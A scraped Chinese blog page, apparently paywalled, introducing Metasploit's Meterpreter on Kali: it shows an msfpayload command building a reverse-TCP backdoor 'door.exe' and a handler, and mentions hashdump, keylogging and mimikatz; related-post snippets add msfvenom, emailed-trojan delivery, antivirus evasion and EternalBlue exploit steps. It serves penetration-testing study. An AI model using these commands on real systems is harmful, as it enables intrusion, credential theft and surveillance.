kali漏洞利用之Meterpreter介绍

最新推荐文章于 2024-12-17 16:08:23 发布
原创 最新推荐文章于 2024-12-17 16:08:23 发布 · 4k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#漏洞 #exe #tcp

本文介绍了如何在Kali Linux中生成和利用Meterpreter后门。通过设置LHOST和LPORT参数,将door.exe植入目标主机,然后在Kali上开启handler等待连接。成功连接后,可以使用Meterpreter的各种命令,如sysinfo、hashdump、screenshot、keyscan_start等进行系统信息查看、哈希抓取、屏幕截图和键盘记录。此外,还提及了扩展工具mimikatz和wdigest,它们能用于抓取明文密码和凭据。

这里写图片描述
使用示例:

1.生成Meterpreter后门

命令语句如下,如果其中的IP为kali攻击机的IP地址,后面跟着的是参数。

msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.223 LPORT=2333 R|msfencode -t exe -c 5 > /root/door.exe

 这个语句中,如果不知道参数是什么,可以在metasploit中查看,查看方式如下
 

use exploit/multi/handler

用这个exp来接受返回的链接

最低0.47元/天 解锁文章
Kali Linux 漏洞利用工具集 metasploit 教程
Sumarua的博客
07-27 3174
文章目录Kali Linux 漏洞利用工具集 metasploit 教程理解基本概念和术语metasploit 命令用法:核心命令模块命令工作命令资源脚本命令数据库后端命令凭证后端命令Metasploit效果与评价: Kali Linux 漏洞利用工具集 metasploit 教程 Metasploit Pro是一个开发和漏洞验证工具,可帮助您将渗透测试工作流划分为更小,更易管理的任务。借助Metasploit Pro,您可以通过基于Web的用户界面利用Metasploit Framework及其利用数据库
[Kali]--Meterpreter深度渗透
wwxxee
11-06 1111
Meterpreter深度渗透 通常情况下,meterpreter的权限就是被攻击进程的启动权限或被攻击用户的执行权限。 Meterpreter会话下: upload:从kali主机上传到靶机 upload /usr/share/windows-binarier/nc.exe C:\ getuid:查看meterpreter的系统运行权限 ps:当前正在运行的进程列表 download:从靶机下载文件到本机上 systeminfo: execute -f notepad.exe:执行程序,加-H可
kali linux之Meterpreter
weixin_30950887的博客
03-07 1356
高级,动态,可扩展的payload 基于meterpreter上下文利用更多漏洞发起攻击,后渗透阶段一站式操作界面 完全基于内存的dll注入式payload(不写硬盘) 注入合法系统进程并建立stager 基于stager上传和预加载dll进行扩展模块的注入(客户端api) 基于stager建立的socket连接建立加密的TLS/1.0通信隧道 ...
渗透工具——kalimsf(后门生成模块msfvenom)
2301_78006725的博客
09-02 1106
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell。
KALI2.0 meterpreter 运用
yemaxq的博客
09-26 2096
初试牛刀 1、生产EXE   就用meterpreter  (shell 一个含义)    (KALI2.0以前版本 为 msfpayload )2.0后 新命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXXX LPORT=XXXX -f exe  > 1234.exe 2、默认生成地址是 ROOT  查看 后 直接经 
kaliMeterpreter控制win10,可以偷看你的电脑的所有数据
微信号:RunsenLiu
10-20 6206
Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、...
kali漏洞利用之Metasploit实战
The__Apollo的博客
04-22 2万+
Metasploit在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。他们或许在渗透测试中的每一方面都不能称为最好用的工具,但组合起来的框架却让它变得强大。1.启动服务:在kali中使用metasploit,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录 2.路径介绍kali中,
精选资源
kali Linux系统的漏洞利用
06-19
Meterpreter是Metasploit框架的核心组件之一,它可以作为漏洞利用成功后的一个后门程序,为攻击者提供与受害主机之间的交互式通信渠道。 - **功能介绍**: - 文件系统访问。 - 系统信息收集。 - 网络监听。 - ...
网络安全kali web安全 Kalimsf简单的漏洞利用
xueshenlaila的博客
03-08 1万+
信息收集 靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 21/tcp ftp 135/tcp msrpc 139/tcp netbios-ssn 445/tcp microsoft-ds 777/tcp multiling-http 1025/tcp NFS-or-IIS 1026/tcp LSA-or-nterm 1029/tcp ms
Kali 渗透测试:Meterpreter在Windows系统下的使用
Bruce_xiaowei的博客
05-11 4307
Kali 渗透测试:Meterpreter在Windows系统下的使用 实 验 环 境: VMware Workstation 16 PRO 操作机:Kali Linux 5.10.0 IP(192.168.68.125) 靶机:Win7 实 验 步 骤: 1. 生成被控端payload 在操作机执行如下命令: ┌──(root💀kali)-[~] └─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.68.125 L
kali-漏洞利用】(3.3)后渗透之Meterpreter(上):命令大全
08-06 4813
kali-漏洞利用Meterpreter后渗透
Kali——Meterpreter后渗透攻击模块-Metasploit的module模块衍生
qq_63167128的博客
03-07 1445
介绍:本文展示了Meterpreter作为Metasploit模块之一的简要概念讲解及攻击流程(也可以在windows系统中下载metasploit工具进行相关操作),工具详细教程可在Sangfor学习平台获取临时免费课程进行学习。 挂个链接:深信服产业教育中心 Meterpreter模块作为后渗透攻击(该阶段通常从攻陷了目标的一些系统和获取了一部分区域系统管理权限后开始)模块的实施通道,可以根据渗透目标需求进行灵活拓展,涉及范围:信息收集,口令攫取,权限提升,内网拓展等等 ​
利用kali Linux使用meterpreter制作免杀木马测试入侵windows电脑
WuHao的博客
10-26 6197
前言:常规使用meterpreter制作木马时会被各大杀毒软件所拦截,固本文介绍一下利用meterpreter下的Venom制作免杀木马。 首先安装Venom Venon克隆地址:https://github.com/r00t-3xp10it/venom tar.gz OR zip OR git clone 2.赋予文件可执行权限: cd venom-main sudo chmod -R +x *.sh 3.安装依赖关系包: cd aux sudo ./setup.sh 4.运行 sudo.
基于22版kali与win7靶机的meterpreter 后渗透记录
xingyuan_king的博客
12-17 1500
1.利用metasploit框架对windows靶机进行渗透测试 2.能够使用meterpreter 后渗透工具完成对攻击的持久化、提权、流量收集、密码破解等操作。
Kali-用户Cookie信息并实现无账号登录
icbug
06-06 2595
大家一定都经历过进入不良网站吧 这种网站一般都含有xss的攻击代码,只不过是被打了伪装而已 本章就会为大家介绍一下,这其中到底暗藏着什么玄机 首先我们需要一个DVWA靶机 搭建教程:https://icbugblog.cn/archives/8/ 注意:这个教程涉及到mariadb需要自己创建一个新的用户才可以使用 搭建好靶场后我们开始我们的教程 首先我们先把DVWA的安全等级调为Low,方便我们开始XSS的基础学习 反向XSS的原理 我们来演示一下它的工作原理。这个功能类似一个留言板,输入信息后.
MSF模拟渗透测试攻击linux实例
lza20001103的博客
04-09 1万+
MSF模拟渗透测试攻击linux实例
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
热门推荐
m0_65712192的博客
11-01 4万+
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
.MSF爆破 简介:实验利用kali MSF中ftp_login模块对metasploitable2中ftp服务实施攻击
qq_44122254的博客
03-21 3173
启动msf 使用search搜索ftp_login模块,使用use命令使用 set rhosts 设置IP set user_file /root/Desktop/user.txt设置用户名 set pass_file /root/Desktop/password.txt设置密码 在执行的时候我有出错了一下,我忘记提前建立user和password的爆破文档了 Run进行爆破 这是爆破成功的 如果只是在自己的kali复现漏洞做实验的话,做字典的时候没必要添加太多,浪费时间 ...
实战-msf扫描靶机上mysql服务空密码
保持微笑的博客
01-15 1489
靶机的安装我们在上面的文章里讲解过了。 操作流程: kali系统的IP是192.168.0.109。启动一台Metasploitable2-Linux靶机,网络模式设置为桥接。 登录Metasploitable2-Linux系统用户名root,密码:root 查看靶机的ip 因为要查找的是mysql的空密码,涉及到登陆问题。我们可以去查找login。 加载模块 查看需要设置的参数 设置目标主机 设置目标账号 查看 BLANK_PASSWORDS 是否...
kali 永恒之蓝漏洞sessions利用
最新发布
03-19
### 创建 Sessions 的过程 要在 Kali Linux 中通过 Metasploit 利用 MS17-010 永恒之蓝漏洞创建 sessions,以下是具体方法: #### 1. **启动并配置环境** 确保攻击端和目标端的网络连接正常。根据描述,攻击端为 Kali Linux (IP 地址 `192.168.214.128`),而被攻击端为 Windows 7 x64 系统 (IP 地址 `192.168.214.129`)[^2]。 #### 2. **加载 EternalBlue 和 DoublePulsar 模块** 在 Kali Linux 上打开终端,并进入 Metasploit 控制台: ```bash msfconsole ``` 随后,在控制台中执行以下命令来设置模块参数: ```plaintext use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.214.129 set LPORT 4444 set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit ``` 上述命令的作用如下: - 加载针对 SMB 协议中的 MS17-010 漏洞的 Exploit 模块。 - 设置远程主机为目标 IP (`RHOSTS=192.168.214.129`)。 - 配置本地监听端口为 `LPORT=4444`。 - 设定有效负载为反向 TCP Meterpreter Shell (`windows/x64/meterpreter/reverse_tcp`),以便成功利用后获得交互式会话[^4]。 #### 3. **验证漏洞是否存在** 运行前可先确认目标机器存在该漏洞。可以通过扫描工具 Nmap 或者直接尝试触发漏洞的方式完成初步判断。如果一切顺利,则会在屏幕上看到类似于“Session created”的提示信息表示已经建立了有效的 session 连接。 #### 4. **管理 Session** 一旦成功建立了一个 meterpreter shell 后就可以对其进行操作了比如浏览文件系统、抓取哈希值等等: ```plaintext sessions -l # 查看当前所有活动session列表 sessions -i X # 与编号X对应的特定session进行互动 ``` ### 注意事项 为了提高成功率,请务必保证目标操作系统未打补丁以及服务处于开启状态;同时考虑到实际环境中可能存在的各种防护措施如杀软等影响因素也需要提前做好规避计划[^1]。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值